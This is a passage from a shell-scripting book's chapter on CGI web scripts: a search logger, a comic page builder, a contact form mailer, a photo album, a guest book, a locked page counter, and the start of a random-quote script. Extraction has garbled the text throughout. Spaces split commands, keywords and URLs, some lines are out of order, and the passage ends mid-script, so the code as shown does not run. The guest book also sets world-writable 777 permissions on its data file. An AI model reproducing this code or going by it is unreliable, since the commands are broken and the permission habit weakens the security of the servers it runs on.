As you can see, the user is prompted with a Yahoo! search box, submits a query, and, as shown in Figure 8-2, gets
standard Yahoo! search results. But there's now a log of the searches:
$ c at s ear ch log .t xt
F ri Se p 5 11 :16 :3 7 MD T 20 03: s t arc h
F ri Se p 5 11 :17 :1 2 MD T 20 03: n o sta r c h
On a busy website, you will doubtless find that monitoring searches with the command t a il - f s ea r ch lo g .t xt
is quite informative as you learn what kind of things people seek online.

#71 Building Web Pages on the Fly


Many websites have graphics and other elements that change on a daily basis. One good example of this is sites
associated with specific comic strips, such as Kevin & Kell, by Bill Holbrook. On his site, the home page always
features the most recent strip, and it turns out that the image-naming convention the site uses for the strip is easily
reverse-engineered, allowing you to include the cartoon on your own page.
A word from our lawyers

There are a lot of copyright issues to consider when scraping the


content off another website for your own. For this example, we received
explicit permission from Bill Holbrook to include his comic strip in this
book. I encourage you to get permission to reproduce any copyrighted
materials on your own site before you dig yourself into a deep hole
surrounded by lawyers.

The Code
# !/ bin / sh
# k evi n -an d- kel l. cgi - Bu ilds a we b pag e on t he fl y t o d is pl a y th e l at e st
#
s tri p fro m the cart oon s t rip K evi n an d Ke l l, b y B i ll H o lb ro o k.
#
< Str ip re fe renc ed w ith p e rmi s s ion o f th e c ar to o ni s t>
m on th= " $(d at e + %m )"
d ay= " $(d at e + %d )"
ye ar= " $(d at e + %y )"
e ch o " C ont en t-t yp e: t ext/ html"
e ch o " "
e ch o
e ch o
e ch o
e ch o
e ch o

" < htm l> <bo dy bgc olor =whit e ><c e n ter > "
" < tab le bo rd er=\ "1\" cell p add i n g=\ " 2 \" c el l sp ac i ng = \" 1\ " >"
" < tr bg col or =\"# 0000 99\"> "
" < th> <f ont c olor =whi te>Bi l l H o l bro o k 's K ev i n &a m p; Ke ll < /f on t >< /t h >< /t r >"
" < tr> <t d>< im g "

# T ypi c al UR L: ht tp:/ /www .kevi n and k e ll. c o m/ 20 03 / st ri p s/ k k2 00 3 10 15 . gi f


e ch o
e ch o
e ch o
e ch o
e ch o
e ch o
e ch o

- n " sr c=\ "h ttp: //ww w.kev i nan d k ell . c om /2 0$ { ye ar } /"


" s tri ps /kk 20 ${ye ar}$ {mont h }${ d a y}. g i f\ "> "
" < /td >< /tr >< tr>< td a lign= \ "ce n t er\ " > "
" & cop y; Bi ll Hol broo k. Pl e ase s ee "
" < a h re f=\ "h ttp: //ww w.kev i nan d k ell . c om /\ "> k ev in a nd k el l. c om </ a >"
" f or mo re st rips , bo oks, e tc. "
" < /td >< /tr >< /tab le>< /cent e r>< / b ody > < /h tm l> "

e xi t 0

How It Works
A quick View Source of the home page for Kevin & Kell reveals that the URL for the graphic is built from the current
year, month, and day, as demonstrated here:
h tt p:/ / www .k evi na ndke ll.c om/20 0 3/s t r ips / k k2 00 31 0 15 .g i f
To build a page that includes this strip on the fly, therefore, the script needs to ascertain the current year (as a two-digit
value), month, and day (both with a leading zero, if needed). The rest of the script is just HTML wrapper to make the
page look nice. In fact, this is a remarkably simple shell script, given the resultant functionality.

Running the Script


Like the other CGI scripts in this chapter, this script must be placed in an appropriate directory so that it can be
accessed via the Web, with the appropriate file permissions. Then it's just a matter of invoking the proper URL from a
browser.

The Results

The web page changes every day, automatically. For the strip of 9 October, 2003, the resulting page is shown in Figure
8-3.

Figure 8-3: The Kevin & Kell web page, built on the fly

Hacking the Script


This concept can be applied to almost anything on the Web if you're so inspired. You could scrape the headlines from
CNN or the South China Morning Post, or get a random advertisement from a cluttered site. Again, if you're going to
make it an integral part of your site, make sure that it's either considered public domain or that you've arranged for
permission.

Turning Web Pages into Email Messages


Combining the method of reverse-engineering file-naming conventions with the website tracking utility shown in the
previous chapter (Script #68, Tracking Changes on Web Pages), you can email yourself a web page that updates not
only its content but its filename as well.
As an example, Cecil Adams writes a very witty and entertaining column for the Chicago Reader called "The Straight
Dope." The specific page of the latest column has a URL of
h tt p:/ / www .s tra ig htdo pe.c om/co l umn s / ${n o w }. ht ml , where no w is the year, month, and day, in
the format YYMMDD. The page is updated with a new column every Friday. To have the new column emailed to a
specified address automatically is rather amazingly straightforward:
# !/ bin / sh
# g etd o pe - gra b the late st co l umn o f ' T h e St ra i gh t D op e '
#
Set it up in c ron to b e run eve r y Fr i d ay .
n ow ="$ ( dat e +%y %m %d)"
u rl ="h t tp: // www .s trai ghtd ope.c o m/c o l umn s / ${ no w} . ht ml "
t o= "te s tin g@ you rd omai n.co m"
# ch a n ge t h is a s a pp ro p ri a te
( c at < < E OF
S ub jec t : T he St ra ight Dop e for $(d a t e " + % A, % d % B, % Y ")
F ro m: C eci l Ada ms <do nt@r eply. c om>
C on ten t -ty pe : t ex t/ht ml
T o: $t o
< ht ml>
< bo dy b ord er =0 le ftma rgin =0 to p mar g i n=0 >
< di v s t yle =' bac kg roun d-co lor:3 0 9;c o l or: f C 6; fo nt - si ze : 45 p t;
fo nt- s tyl e: san s- seri f;fo nt-we i ght : 9 00; t e xt -a li g n: ce n te r ;
m ar gin : 0;p ad din g: 3px; '>
T HE ST R AIG HT DO PE </di v>
< di v s t yle =' pad di ng:3 px;l ine-h e igh t : 1.1 ' >
E OF
l ynx -so ur ce "$ url" | \
se d -n ' /<h r> /,$p ' | \
se d 's |s rc= ". ./ar t|sr c="ht t p:/ / w ww. s t ra ig ht d op e. c om / ar t| ' | \

se d 's |h ref =" ..|h ref= "http : //w w w .st r a ig ht do p e. co m |g '


e cho "</ di v>< /b ody> </ht ml>"
) | /u s r/s bi n/s en dmai l -t
e xi t 0
Notice that this script adds its own header to the message and then sends it along, including all the footer and
copyright information on the original web page.

#72 Processing Contact Forms


While sophisticated CGI programming is almost always done in either Perl or C, simple tasks can often be
accomplished with a shell script. There are some security issues of which you should be conscious, because it's rather
easy to inadvertently pass a dangerous parameter (for example, an email address that a user enters) from a form to
the shell for evaluation, which a hacker might exploit. However, these potential security holes will likely never arise if
your CGI needs are sufficiently modest.
A very common page on a website is a contact request form, which is fed to the server for processing and then
emailed to the appropriate party within the organization. Here's the HTML source for a simple form (with a little
Cascading Style Sheet (CSS) information thrown in to make it pretty):
<bo d y b gc o lor = #C C FF C C> < cen ter >
<!- - T w ea k ac t io n v a lu e if sc rip t i s p lac ed i n / cg i-b in/ or oth er -->
<fo r m m et h od= " po s t" ac t ion ="0 74- con tac tus .cgi "
st y le = 'b o rde r : 3 px do u ble #6 36; pad din g:4 px'>
<di v s t yl e ='f o nt - si z e: 175 %;f ont -we igh t;b old;
bo r de r -b o tto m : 3 px do u ble #6 36' >We Lo ve Feed bac k! </d iv>
Nam e : < in p ut t yp e =" t ex t " n ame ="n ame ">< br>
Ema i l: <i n put ty p e= " te x t" nam e=" ema il" ><b r>
You r m e ss a ge o r c om m en t (p lea se be bri ef) :<br >
<te x ta r ea row s =" 5 " c ol s ="7 0" nam e=" com men ts"> </t ex tar ea> <br>
<in p ut ty p e=" s ub m it " v a lue ="s ubm it" >
</f o rm >
</c e nt e r>
This form has three input fields: one for name, one for email address, and one for comments. When the user clicks the
submit button, the information is packaged up and sent to co nta ctu s.c gi for interpretation and processing.
Because the form uses a m et h od ="po st" encoding, the data is handed to the CGI script as standard input. For
entries of " Da v e", <" ta y lor @in tui tiv e.co m">, and "my co mm ent" , the resulting data stream would be
nam e =D a ve & ema i l= t ay l or % 40i ntu iti ve. com &co mmen ts= my +co mme nt
That's all the information we need to create a shell script that turns the data stream the form information into an
email message, mails it off, and puts up a thank-you message for the web surfer.

The Code
#!/ b in / sh
# f o rm m ai l - P ro c es s es the co nta ct us for m da ta, e mai ls it t o t he des ign ate d
#
re c ip i ent , a n d r et u rns a suc cin ct tha nk-y ou me ssa ge.
rec i pi e nt = "ta y lo r "
tha n ky o u= " tha n ky o u. h tm l "

# o pti ona l 't han ks ' p age

( c a t < < E OF
Fro m : ( Yo u r W e b S it e C o nta ct For m) www @$( host nam e)
To: $r e ci p ien t
Sub j ec t : C ont a ct Re q ue s t f rom We b S ite
Con t en t o f th e W e b s it e co nta ct for m:
EOF
c a t - | tr ' &' '\ n ' | \
s e d - e ' s /+ / / g ' - e ' s/% 40/ @/g ' - e ' s/=/ : / '
e c ho "" ; ec h o " "
e c ho "F o rm s ub m it t ed on $(d ate )"
) | se n dm a il - t
ech o " C on t ent - ty p e: te x t/h tml "
ech o " "
if [ - r $ t han k yo u ] ; t hen
c a t $ th a nky o u
els e
e c ho "< h tml > <b o dy bg c olo r=\ "wh ite \"> "
e c ho "T h ank yo u . W e' l l t ry to con tac t y ou s oon es t."
e c ho "< / bod y >< / ht m l> "
fi

exi t 0

How It Works
The c at statement translates the field separator & into a carriage return with tr, then cleans up the data stream a bit
with s ed , turning + into a space, the % 40 encoding sequence into an @ , and = into a colon followed by a space.
Finally, a rudimentary thank-you message is displayed to the user.
Frankly, this isn't the most elegant solution (a Perl-based script could have more flexibility, for example), but for a quick
and dirty hack, it'll do just fine.

Running the Script


Remember that every CGI script needs to be readable and executable by everyone. To use this contact form, you need
to save the HTML document somewhere on your site, perhaps on your home page or on another page called
con t ac t us . htm l . It might look like Figure 8-4.

Figure 8-4: A typical user feedback form, already filled in


To run the CGI script, simply enter information into the fields specified on the form and click the submit button.

The Results
The results of running this script submitting a contact query are twofold. An email is sent to the registered
recipient, and either the contents of a thank-you HTML document (the variable t han kyo u in the script) are displayed
or a rudimentary thank-you message is displayed. Here's the email produced from the form input shown in Figure 8-4:
Fro m : ( Yo u r W e b S it e C o nta ct For m) www @lo calh ost .i ntu iti ve.c om
To: ta y lo r
Sub j ec t : C ont a ct Re q ue s t f rom We b S ite
Con t en t o f th e W e b s it e co nta ct for m:
nam e : D av e Ta y lo r
ema i l: ta y lor @ in t ui t iv e .co m
com m en t s: Ver y i n te r es t ing ex amp le% 2C but I d on% 27 t l ike you r f orm co lor sc hem e%2 1
For m s u bm i tte d o n F r i S ep 5 1 4:2 0:5 4 M DT 2003
Note that not all of the punctuation characters are translated back into their regular characters, so instead of
exa m pl e , b ut we see ex a mp le%2 C b ut. This can be easily remedied by adding more mapping rules in the
sed statement, as desired.

#73 Creating a Web-Based Photo Album


CGI shell scripts aren't limited to working with text. A common use of websites is to have a photo album that allows you
to upload lots of pictures and that has some sort of software to help organize everything and make it easy to browse.
Surprisingly, a basic "proof sheet" of photos in a directory is quite easy to produce as a shell script. Here's one that's
only 44 lines.

The Code
# !/ bin / sh
# a lbu m - on lin e phot o al bum s c rip t
e ch o " C ont en t-t yp e: t ext/ html"
e ch o " "
h ea der = "he ad er. ht ml"
f oo ter = "fo ot er. ht ml"
c ou nt= 0
i f [ - f $h ea der ] ; t hen
c at $ hea de r
e ls e
e cho "<h tm l>< bo dy b gcol or='w h ite ' lin k = '# 66 66 6 6' v l in k =' #9 9 99 99 ' >< ce n te r> "
fi
e ch o " < h3> Co nte nt s of $(d irnam e $S C R IPT _ N AM E) </ h 3> "
e ch o " < tab le ce ll padd ing= '3' c e lls p a cin g = '5 '> "
f or na m e i n *jp g
do
i f [ $co un t - eq 4 ] ; t hen
ec h o " </ td> </ tr>< tr>< td al i gn= ' c ent e r '> "
co u nt= 1
e lse
ec h o " </ td> <t d al ign= 'cent e r'> "
co u nt= $( ($c ou nt + 1))
fi
n ice n ame =" $(e ch o $n ame | sed 's/ . j pg/ / ; s/ -/ / g ') "
e cho "<a h ref =' $nam e' t arget = _ne w > <im g st yl e= ' pa dd i ng : 2p x' "
e cho "sr c= '$n am e' h eigh t='10 0 ' w i d th= ' 1 00 ' bo r de r= ' 1' > </ a> < BR >"
e cho "<s pa n s ty le=' font -size : 80 % ' >$n i c en am e< / sp an > "
d on e
e ch o " < /td >< /tr >< tabl e>"
i f [ - f $f oo ter ] ; t hen
c at $ foo te r
e ls e
e cho "</ ce nte r> </bo dy>< /html > "
fi
e xi t 0

How It Works
Almost all of the code here is HTML to create an attractive output format. Take out the ec h o statements, and there's a
simple f or loop that iterates through each JPEG file in the current directory.
The directory name in the <h 3> block is extracted by using $ (di r na m e $S C RI P T_ NA M E) . If you flip back to the
output of Script #69, Seeing the CGI Environment, you'll see that S C RI P T_ NA M E contains the URL name of the CGI
script, minus the h ttp :/ / prefix and the hostname. The d irn a me part of that expression strips off the actual name
of the script being run (in de x.cg i), so that only the current directory within the website file hierarchy is left.
This script also works best with a specific file-naming convention: Every filename has dashes where it would otherwise

have spaces. For example, the name value of s uns e t -at - h om e. jp g is transformed into the n ic e na me of
s un set at ho me. It's a simple transformation, but one that allows each picture in the album to have an attractive
and human-readable name, rather than DS C0 00 3 5 .JP G or some-thing similar.

Running the Script


To have this script run, you must drop it into a directory full of JPEG images, naming the script in de x .c gi . If your
web server is configured properly, requesting to view that directory then automatically invokes in d ex .c g i if no
i nd ex. h tml file is present, and you have an instant, dynamic photo album.

The Results
Given a directory of landscape and nature shots, the results are quite pleasing, as shown in Figure 8-5. Notice that
h ea der . htm l and fo ote r.htm l files are present in the same directory, so they are automatically included in the
output too.

Figure 8-5: An instant online photo album created with 44 lines of shell script!
See this page for yourself!

The photo album is online at


h ttp : / /ww w . int u it i ve .c o m/ w ic ke d /e xa m pl es / ph ot o s/

Hacking the Script


One limitation of this strategy is that the full-size version of each picture must be downloaded for the photo album view
to be shown; if you have a dozen 100K picture files, that could take quite a while for someone on a modem. The
thumbnails aren't really any smaller. The solution is to automatically create scaled versions of each image, which can
be done within a script by using a tool like ImageMagick. Unfortunately, very few Unix installations include
sophisticated graphics tools of this nature, so if you'd like to extend this photo album in that direction, start by learning
more about the ImageMagick tool at http :/ /w w w .im a g ema g ic k .o rg /
Another way to extend this script would be to teach it to show a clickable "folder" icon for any subdirectories found, so
that you can have an entire file system or tree of photographs, organized into portfolios. To see how that might look,
visit my online photo portfolio, built around a (substantial, I admit) variation of this script:
h tt p:/ / por tf oli o. intu itiv e.com /

Note This photo album script is one of my favorites, and I've spent many a day expanding and improving upon
my own online photo album software. What's delightful about having this as a shell script is that it's
incredibly easy to extend the functionality in any of a thousand ways. For example, because I use a script
called sh owp ic to display the larger images rather than just linking to the JPEG image, it would take
about 15 minutes to implement a perimage counter system so that people could see which images were
most popular. Explore my portfolio site, cited earlier, and pay attention to how things are hooked together:
It's all shell scripts underneath.

#74 Building a Guest Book


A common and popular feature of websites is a guest book, modeled after the book commonly found at bed-andbreakfasts and chic resorts. The concept's simple: Enter your name, email address, and a comment, and it'll be
appended to an existing HTML page that shows other guest comments.
To simplify things, the same script that produces the "add your own entry" form and processes new guest entries as
they're received will also display the existing guest book entries (saved in a separate text file) at the top of the web
page. Because of these three major blocks of functionality, this script is a bit on the long side, but it's well commented,
so it should be comprehensible. Ready?

The Code
# ! / b in /s h
# g u es tb ook - Di s play s the cu r r e n t g u e s t b o o k e n t r i e s , a p p e n d s a
#
si mp le f orm f or v i sito rs t o a d d t h e i r o w n c o m m e n t s , a n d
#
ac ce pts and p roce s ses new g u e s t e n t r i e s . W o r k s w i t h a s e p a r a t e
#
da ta fi l e th a t ac t uall y c o n t a i n s t h e g u e s t d a t a .
h o m e di r= /ho m e/ta y lor/ w eb/w ick e d / e x a m p l e s
g u e s tb oo k=" $ home d ir/g u estb ook . t x t "
t e m p fi le ="/ t mp/g u estb o ok.$ $"
s e d t em p= "/t m p/gu e stbo o k.se d.$ $ "
h o s t na me ="i n tuit i ve.c o m"
t r a p " /b in/ r m -f $tem p file $s e d t e m p " 0
echo
echo
echo
echo

" Co nte n t-ty p e: t e xt/h tml "


""
" <h tml > <tit l e>Gu e stbo ok f o r $ h o s t n a m e < / t i t l e > "
" <b ody bgco l or=' w hite '>< h 2 > G u e s t b o o k f o r $ h o s t n a m e < / h 2 > "

i f [ " $R EQU E ST_M E THOD " = " POS T " ] ; t h e n


# A ne w g u estb o ok e n try was s u b m i t t e d , s o s a v e t h e i n p u t s t r e a m
c a t - | t r '&+ ' '\n ' > $te m p f i l e
n a me =" $(g r ep ' y ourn a me=' $t e m p f i l e | c u t - d = - f 2 ) "
e m ai l= "$( g rep ' emai l =' $ tem p f i l e | c u t - d = - f 2 | s e d ' s / % 4 0 / @ / ' ) "
# No w, gi v en a URL e ncod ed s t r i n g , d e c o d e s o m e o f t h e m o s t i m p o r t a n t
# pu nc tua t ion ( but n ot a ll p u n c t u a t i o n ! )
c a t << " EOF " > $ s edte m p
s / % 2 C/ ,/ g;s / %21/ ! /g;s / %3F/ ?/g ; s / % 4 0 / @ / g ; s / % 2 3 / # / g ; s / % 2 4 / $ / g
s / % 2 5/ %/ g;s / %26/ \ &/g; s /%28 /(/ g ; s / % 2 9 / ) / g ; s / % 2 B / + / g ; s / % 3 A / : / g
s / % 3 B/ ;/ g;s / %2F/ \ //g; s /%27 /'/ g ; s / % 2 2 / " / g
EOF
c o mm en t=" $ (gre p 'co m ment =' $ t e m p f i l e | c u t - d = - f 2 | s e d - f $ s e d t e m p ) "
# Se qu enc e s to look out for : % 3 C = < % 3 E = > % 6 0 = `

fi

i f e ch o $ n ame $ emai l $co mme n t | g r e p ' % ' ; t h e n


ec ho "< h 3>Fa i led: ille gal c h a r a c t e r o r c h a r a c t e r s i n i n p u t : "
ec ho "N o t sa v ed.< b r>Pl eas e a l s o n o t e t h a t n o H T M L i s a l l o w e d . < / h 3 > "
e l if [ ! - w $g u estb o ok ] ; t h e n
ec ho "< h 3>So r ry, c an't wr i t e t o t h e g u e s t b o o k a t t h i s t i m e . < / h 3 > "
e l se
# Al l i s wel l . Sa v e it to t h e d a t a f i l e !
ec ho "$ ( date ) |$na m e|$e mai l | $ c o m m e n t " > > $ g u e s t b o o k
ch mo d 7 7 7 $g u estb o ok
# ensure it's not locked out to webmaster
fi

# I f w e hav e a g u estb o ok t o w o r k w i t h , d i s p l a y a l l e n t r i e s
i f [ - f $gu e stbo o k ] ; the n
e c ho " <ta b le>"
w h il e rea d lin e

do

da te ="$ ( echo $lin e | c ut - d \ | - f 1 ) "


na me ="$ ( echo $lin e | c ut - d \ | - f 2 ) "
em ai l=" $ (ech o $li n e | cut - d \ | - f 3 ) "
co mm ent = "$(e c ho $ l ine | c u t - d \ | - f 4 ) "
ec ho "< t r><t d ><a h ref= 'ma i l t o : $ e m a i l ' > $ n a m e < / a > s i g n e d t h u s l y : < / t d > < / t r > "
ec ho "< t r><t d ><di v sty le= ' m a r g i n - l e f t : 1 i n ' > $ c o m m e n t < / d i v > < / t d > < / t r > "
ec ho "< t r><t d ali g n=ri ght s t y l e = ' f o n t - s i z e : 6 0 % ' > A d d e d $ d a t e "
ec ho "< h r no s hade > </td ></ t r > "
d o ne < $g u estb o ok
fi

e c ho " </t a ble> "

# N o w cr eat e inp u t fo r m fo r s u b m i t t i n g n e w g u e s t b o o k e n t r i e s . . .
echo
echo
echo
echo
echo
echo
echo
echo

" <f orm meth o d='p o st' act i o n = ' $ ( b a s e n a m e $ 0 ) ' > "
" Pl eas e fee l fre e to sig n o u r g u e s t b o o k t o o : < b r > "
" Yo ur n ame: <inp u t ty pe= ' t e x t ' n a m e = ' y o u r n a m e ' > < b r > "
" Yo ur e mail addr e ss: <in p u t t y p e = ' t e x t ' n a m e = ' e m a i l ' > < b r > "
" An d y o ur c o mmen t :<br >"
" <t ext a rea n ame= ' comm ent ' r o w s = ' 5 ' c o l s = ' 6 5 ' > < / t e x t a r e a > "
" <b r>< i nput type = 'sub mit ' v a l u e = ' s i g n o u r g u e s t b o o k ' > "
" </ for m >"

e c h o " </ bod y ></h t ml>"


exit 0

How It Works
The scariest-looking part of this code is the small block of s e d commands that translate most of the common
punctuation characters from their URL encodings back to the actual character itself:
c a t << " EOF " > $ s edte m p
s / % 2 C/ ,/ g;s / %21/ ! /g;s / %3F/ ?/g ; s / % 4 0 / @ / g ; s / % 2 3 / # / g ; s / % 2 4 / $ / g
s / % 2 5/ %/ g;s / %26/ \ &/g; s /%28 /(/ g ; s / % 2 9 / ) / g ; s / % 2 B / + / g ; s / % 3 A / : / g
s / % 3 B/ ;/ g;s / %2F/ \ //g; s /%27 /'/ g ; s / % 2 2 / " / g
EOF
If you look closely, however, it's just an s/ol d / n e w / g sequence over and over, with different % x x values being
substituted. The script could bulk-translate all URL encodings, also called escape sequences, but it's useful to ensure
that certain encodings, including those for <, > , and ` , are not translated. Security, dontcha know a nice way to
sidestep people who might be trying to sneak unauthorized HTML into your guest book display.

Running the Script


In addition to allowing files within to be executed by the web server, the directory in which g u e s t b o o k . c g i resides
also needs to have write permission so that the script can create a g u e s t b o o k . t x t file and add entries.
Alternatively, you can simply create the file by hand and ensure that it's readable and writable by all:
$ t o uc h gue s tboo k .txt
$ c h mo d 666 gues t book . txt
The following are some sample contents of the g u e s t b o o k . t x t file:
$ c a t gu est b ook. t xt
S a t Se p 6 1 4 :57: 0 2 MS T 200 3|L u c a s G o n z e | l u c a s @ g o n z e . c o m | I v e r y m u c h e n j o y e d
m y s ta y at y our w eb s i te. Bes t o f l u c k .
S a t Se p 6 2 2 :54: 4 9 MS T 200 3|D e e - A n n L e B l a n c | d e e @ r e n a i s s o f t . c o m | K i n d a p l a i n ,
b u t th at 's b ette r tha n it bei n g c o v e r e d i n a n i m a t i o n s a n d f l a m i n g t e x t . : )
S u n Se p 7 0 2 :50: 4 8 MS T 200 3|M C | n u l l @ m c s l p . c o m | I d o n ' t w a n t t h e w o r l d , I j u s t
w a n t y ou r h a lf.
T u e Se p 9 0 2 :34: 4 8 MS T 200 3|A n d r e y B r o n f i n | a n d r e y b @ e l r o n t e l e s o f t . c o m | N i c e t o
b e h er e.

The Results
Figure 8-6 shows the guest book displaying the few entries just shown.

Figure 8-6: A guest book system, all in one neat shell script

Hacking the Script


The data file deliberately forces all the information of each guest book entry onto a single line, which might seem weird
but in fact makes certain modifications quite easy. For example, perhaps you'd rather have your guest book entries
arranged from newest to oldest (rather than the current oldest-to-newest presentation). In that case, rather than ending
the parenthesized whi l e loop with < $gues t b o o k , you could begin it thusly:
c a t -n $ gue s tboo k | s o rt - rn | c u t - c 8 - | w h i l e
If you'd rather have a friendlier date format than the output of the d a t e command, that'd be another easy tweak to the
script. On most systems either the date man page or the s t r f t i m e man page explains all the % x format values.
You can spend hours tweaking date formats because there are literally more than 50 different possible ways to display
elements of the date and time using aformat string.
It should also be easy to customize the appearance of this guest book by perhaps having separate h e a d e r . h t m l
and fo ot er. h tml files and then using an appropriate code block near the top and bottom of the script:
i f [ - f hea d er.h t ml ] ; th en
c a t he ade r .htm l
fi
Finally, there are a lot of odd people on the Web, and I have learned that it's smart to keep a close eye on anything to
which people can add input without any screening process. As a result, a very sensible hack to this guest book script
would be to have new entries emailed to you, so you could immediately delete any inappropriate or off-color entries
before being embarassed by the content of your site.

#75 Creating a Text-Based Web Page Counter


One popular element of many web pages is a page counter that increments each time a request for the page in
question is served. A quick glance at the counter value then lets you see how popular your pages are and whether
they're seeing lots of visitors. While counters aren't typically written as shell scripts, that doesn't mean it can't be done,
and we'll throw caution to the wind and build it ourselves!
The fundamental challenge with this particular script is that there's a possible race condition, a situation in which two
people visit the page simultaneously and each of the counter scripts steps on the other when writing to the data file.
You can try to solve the race condition within the script itself, but that's surprisingly tricky. Consider the following few
lines of code:
w hi le [ -e $ loc kf ile ] ; do
s lee p 1
d on e
t ou ch $ loc kf ile
It seems as though this should work, only allowing the script to escape the wh i le loop when the lock file doesn't exist
and then immediately creating the lock file to keep everyone else out. But it doesn't work. Remember that two copies
can be running essentially simultaneously, so what happens if one ascertains that there's no lock file, gets through the
w hi le loop, and then is swapped out by the CPU before creating the new lock file? Meanwhile, the second script
tests, also finds there's no lock file, and creates one, convinced it now has exclusive access to the data. Then the first
script swaps back in, it touches the lock file (which already exists, though it doesn't know that), and mayhem ensues.
The solution is to use a utility written for the job, to ensure that you don't encounter a race condition in the middle of
your locking sequence. If you're lucky, your Unix has the helpful l oc k f command, which executes a specific
command while holding an exclusive file lock. If not, many Unixes have the l o ck f il e utility as an alternative. To be
portable, this script works with both, depending on what it can find. Script #10 discusses this issue in greater depth too.

The Code
# !/ bin / sh
# c oun t er - A s im ple text -base d pa g e co u n te r, w i th a p pr o pr ia t e lo c ki ng .
m yh ome = "/h om e/t ay lor/ web/ wicke d /ex a m ple s "
c ou nte r ="$ my hom e/ coun ter. dat"
l oc kfi l e=" $m yho me /cou nter .lck"
u pd ate c oun te r=" $m yhom e/up datec o unt e r "
# N ote tha t thi s scri pt i s not int e n ded t o be c a ll ed di r ec tl y f ro m
# a we b br ow ser s o it doe sn't u se t h e o t h er wi se ob li g at o ry
# c ont e nt- ty pe he ader mat erial .
# A sce r tai n whe th er w e ha ve lo c kf o r lo c k fi le s y st em ap p s
i f [ - z $( wh ich l ockf ) ] ; the n
i f [ -z $( whi ch loc kfil e) ] ; th e n
ec h o " (c oun te r: n o lo cking uti l i ty a v ai la bl e )< br > "
ex i t 0
e lse # p ro cee d with the lock f ile c omm a n d
if [ ! - f $ co unte r ] ; the n
e cho " 0" # it'l l be crea t ed s h ort l y
el s e
c at $c oun te r
fi

fi
e ls e

t r ap "/ bin /r m -f $lo ckfil e " 0


lo c kfi le -1 - l 10 -s 2 $lo c kfi l e
if [ $ ? -ne 0 ] ; the n
e cho " (co un ter: cou ldn't cre a t e l o c kf il e i n ti m e) "
exi t 0
fi
$u p dat ec oun te r $c ount er

i f [ ! - f $co un ter ] ; then


ec h o " 0" # it 'll be c reate d sh o r tly
e lse
ca t $c ou nte r
fi

fi

l ock f -s - t 1 0 $loc kfil e $up d ate c o unt e r $ co un t er


i f [ $? -n e 0 ] ; t hen
ec h o " (c oun te r: c ould n't c r eat e loc k f il e in ti me ) "
fi

e xi t 0
The cou n ter script calls $upd atec ounte r , a second, smaller script that's used to actually increment the counter.
It ignores any file-locking issues, assuming that they're dealt with elsewhere:
# !/ bin / sh
# u pda t eco un ter - A t iny scrip t th a t up d a te s th e c ou n te r f il e t o
#
th e va lu e s pe cifi ed. Assum e s t h a t l o c ki ng i s d on e e l se wh e re .
i f [ $ # -n e 1 ] ; the n
e cho "Us ag e: $0 cou ntfi le" > & 2
e xit 1
fi
c ou nt= " $(c at $1 )"
n ew cou n t=" $( (${ co unt: -0} + 1)) "
e ch o " $ new co unt " > $1
c hm od a +rw $ 1
e xi t 0

How It Works
The cou n ter and u pd ate count er scripts do something quite simple: Together they open up a file; grab the
number therein; increment it; save the new, larger value; and display that value. All the complexity in these scripts is
associated with locking files to ensure that there's no collision when updating the counter value.
The basis of the main conditional ascertains whether the system has l oc k f (the preferred choice), l oc kf i le (an
acceptable alternative), or nothing:
i f [ - z $( wh ich l ockf ) ] ; the n
i f [ -z $( whi ch loc kfil e) ] ; th e n
e c ho "( cou nt er: no l ockin g ut i l ity a va il ab l e) <b r >"
The whi c h command looks for a specific command in the current PATH; if it can't find it, it returns zero. If neither
l oc kf nor lo ck fil e exists, the script just refuses to run and quits, but if either locking system can be found, it
uses that and proceeds.
The search path for scripts running within the CGI environment is often shorter than the path for interactive scripts, so if
you know that the system has lock f or loc k fil e and the script can't find it, you'll need to do one of two things.
Modify the runtime PATH by adding a line of code like the following to the beginning of the script, supplying the
directory that contains the program in question:
P AT H=" $ {PA TH }:/ ho me/t aylo r/bin "
Or replace both $(w hi ch lo ckf) and $( wh i c h l o c kfi l e) with the full lo c kf il e or lo ck f path and
filename that you want to use in the script.

Running the Script


This script isn't intended to be invoked directly by a user or linked to directly by a web page. It is most easily run as a
server-side include (SSI) directive on an SSI-enabled web page, typically denoted by changing the suffix of the
enabled page from . ht ml to .s html so that the web server knows to process it specially.
The .sh t ml web page would have a line of code embedded in the HTML similar to the following:

< !- -#e x ec cm d=" /w icke d/ex ample s /co u n ter . s h" -- >

The Results
A short SSI page that includes a call to the co u n ter . s h script is shown in Figure 8-7. This same HTML page also
uses Script #76, Displaying Random Text.

Figure 8-7: Server-side includes let us invoke shell scripts from within HTML files

Hacking the Script


If your system doesn't support SSI, another approach to getting a counter, though a bit clunky, would be to have a
wrapper script that emulates this simple SSI mechanism. Here's an example in which the string "---countervalue---",
embedded in the HTML page to display, will be replaced with the actual numeric counter value for the specified HTML
file:
# !/ bin / sh
# s tre a mfi le - Ou tput s an HTML fil e , re p l ac in g t he s e qu e nc e
#
-- - cou nt erv al ue-- - wi th th e cu r r ent c ou nt er va lu e .
# T his scr ip t s ho uld be r efere n ced , ins t e ad o f $ in fi l e, fr om ot he r p ag e s.
i nf ile = "pa ge -wi th -cou nter .html "
c ou nte r =". /c oun te r.sh "
e ch o " C ont en t-t yp e: t ext/ html"
e ch o " "
v al ue= " $($ co unt er )"
s ed "s / --- co unt er valu e--- /$val u e/g " < $ i n fi le
e xi t 0

#76 Displaying Random Text


The built-in server-side include features offer some wonderful ways to expand and extend your website. One way that's
a favorite with many webmasters is the ability to have an element of a web page change each time the page is loaded.
The ever-changing element might be a graphic, a news snippet, or a featured subpage, or it might just be a tag line for
the site itself, but one that's slightly different for each visit to keep the reader interested and hopefully coming
back for more.
What's remarkable is that this trick is quite easy to accomplish with a shell script containing an aw k program only a
few lines long, invoked from within a web page via an SSI include (see Script #75 for an example of SSI directive
syntax and naming conventions for the file that calls the server-side include). Let's have a look.

The Code
# !/ bin / sh
# r and o mqu ot e - G iven a o ne-li n e-p e r -en t r y da ta f il e, th i s
#
sc r ipt r and om ly p icks one l ine a nd d i sp la ys it . B es t u se d
#
as an SS I c al l wi thin a we b pa g e .
a wk scr i pt= "/ tmp /r ando mquo te.aw k .$$ "
i f [ $ # -n e 1 ] ; the n
e cho "Us ag e: ra ndom quot e dat a fil e n ame " >& 2
e xit 1
e li f [ ! - r "$1 " ] ; then
e cho "Er ro r: qu ote file $1 i s mi s s ing o r no t r ea da b le " > &2
e xit 1
fi
t ra p " / bin /r m - f $awk scri pt" 0
c at << "EO F" > $a wksc ript
B EG IN { sr an d() }
{ s[ NR ] = $ 0 }
E ND
{ pr in t s [r andi nt(N R)] }
